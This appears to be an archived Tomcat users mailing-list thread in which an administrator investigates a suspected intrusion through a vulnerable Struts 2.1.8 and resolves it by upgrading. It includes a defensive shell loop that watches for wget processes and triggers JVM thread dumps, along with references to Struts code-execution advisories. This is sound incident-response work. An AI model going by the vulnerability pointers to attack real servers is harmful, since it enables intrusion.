Re: Regarding i think an intrusion - Solved =)
Hello all. We internally had closed the issue. So i can tell you thanks a lot you rock =) Thank for all your effort and time. Kindly yours, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-26 15:32 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Well well well. Thank you all so much !!! Since Struts upgrade i got not intrussion on my servers =) =) Thank you list for the support, for the time and for helpme with this issue. Yours, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-20 12:45 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com : Hello all, again its me =) Just for you that today we deployed our apps using struts 2.3.16.2 So since today i will monitor those server very closely =) Thanks all people. I will tell you how things go. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com : Hello all ! Developers are still estimating the effort for upgrading struts i will let you know how things are going. Thanks all for replying me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done Maybe too many dumps all togheter, now im trying to get a live capture without luck =( If you know a better method, please letme know it. Thanks for your effort, knid regards, Leonardo Saludos.- Leonardo Santagostini MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora) MGesto ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000] java.lang.Thread.State: TIMED_WAITING (sleeping) at java.lang.Thread.sleep(Native Method) at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508) at java.lang.Thread.run(Thread.java:662) MGEstos registros informativos producen MUCHO ruido MGlog4j.properties MGlog4j.logger.org.quartz=OFF //(Callate Quartz) MGeso ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000] java.lang.Thread.State: RUNNABLE at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763) at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345) at java.util.regex.Pattern$Curly.match0(Pattern.java:3770) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern
Re: Regarding i think an intrusion
Well well well. Thank you all so much !!! Since Struts upgrade i got not intrussion on my servers =) =) Thank you list for the support, for the time and for helpme with this issue. Yours, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-20 12:45 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Hello all, again its me =) Just for you that today we deployed our apps using struts 2.3.16.2 So since today i will monitor those server very closely =) Thanks all people. I will tell you how things go. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com : Hello all ! Developers are still estimating the effort for upgrading struts i will let you know how things are going. Thanks all for replying me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done Maybe too many dumps all togheter, now im trying to get a live capture without luck =( If you know a better method, please letme know it. Thanks for your effort, knid regards, Leonardo Saludos.- Leonardo Santagostini MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora) MGesto ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000] java.lang.Thread.State: TIMED_WAITING (sleeping) at java.lang.Thread.sleep(Native Method) at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508) at java.lang.Thread.run(Thread.java:662) MGEstos registros informativos producen MUCHO ruido MGlog4j.properties MGlog4j.logger.org.quartz=OFF //(Callate Quartz) MGeso ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000] java.lang.Thread.State: RUNNABLE at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763) at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345) at java.util.regex.Pattern$Curly.match0(Pattern.java:3770) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0
Re: Regarding i think an intrusion
Hello all, again its me =) Just for you that today we deployed our apps using struts 2.3.16.2 So since today i will monitor those server very closely =) Thanks all people. I will tell you how things go. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Hello all ! Developers are still estimating the effort for upgrading struts i will let you know how things are going. Thanks all for replying me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done Maybe too many dumps all togheter, now im trying to get a live capture without luck =( If you know a better method, please letme know it. Thanks for your effort, knid regards, Leonardo Saludos.- Leonardo Santagostini MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora) MGesto ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000] java.lang.Thread.State: TIMED_WAITING (sleeping) at java.lang.Thread.sleep(Native Method) at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508) at java.lang.Thread.run(Thread.java:662) MGEstos registros informativos producen MUCHO ruido MGlog4j.properties MGlog4j.logger.org.quartz=OFF //(Callate Quartz) MGeso ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000] java.lang.Thread.State: RUNNABLE at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763) at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345) at java.util.regex.Pattern$Curly.match0(Pattern.java:3770) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match
Re: Regarding i think an intrusion
Hello all ! Developers are still estimating the effort for upgrading struts i will let you know how things are going. Thanks all for replying me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com: Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done Maybe too many dumps all togheter, now im trying to get a live capture without luck =( If you know a better method, please letme know it. Thanks for your effort, knid regards, Leonardo Saludos.- Leonardo Santagostini MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora) MGesto ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000] java.lang.Thread.State: TIMED_WAITING (sleeping) at java.lang.Thread.sleep(Native Method) at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508) at java.lang.Thread.run(Thread.java:662) MGEstos registros informativos producen MUCHO ruido MGlog4j.properties MGlog4j.logger.org.quartz=OFF //(Callate Quartz) MGeso ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000] java.lang.Thread.State: RUNNABLE at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763) at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345) at java.util.regex.Pattern$Curly.match0(Pattern.java:3770) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168
Re: Regarding i think an intrusion
Hello all, sorry for the late, but i was in holiday from wednesday. Ok, i make a ticket to developers for upgrading strus. They told me that will work on that. So, i will keep in touch with the news =) Again, thanks all for all the support you give me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-01 18:48 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. Ouch. Yeah, there's always that ;) - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4 Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1 qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67 hEEF98sa1D+pfJC5FGdj =ZJPK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Well thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Let me know if im missing something. thanks ! Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 9:34 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Hello all, sorry for the late, but i was in holiday from wednesday. Ok, i make a ticket to developers for upgrading strus. They told me that will work on that. So, i will keep in touch with the news =) Again, thanks all for all the support you give me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-01 18:48 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. Ouch. Yeah, there's always that ;) - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4 Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1 qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67 hEEF98sa1D+pfJC5FGdj =ZJPK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 10:29 AM, Leonardo Santagostini wrote: Well thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Seems like it's broken. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU 8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz 6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP 9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz /V2lPhNpr08bYy+s2pkN =4tjy -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Ok, again its uploaded. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing Kind regards !, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 11:57 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 10:29 AM, Leonardo Santagostini wrote: Well thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Seems like it's broken. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU 8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz 6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP 9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz /V2lPhNpr08bYy+s2pkN =4tjy -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
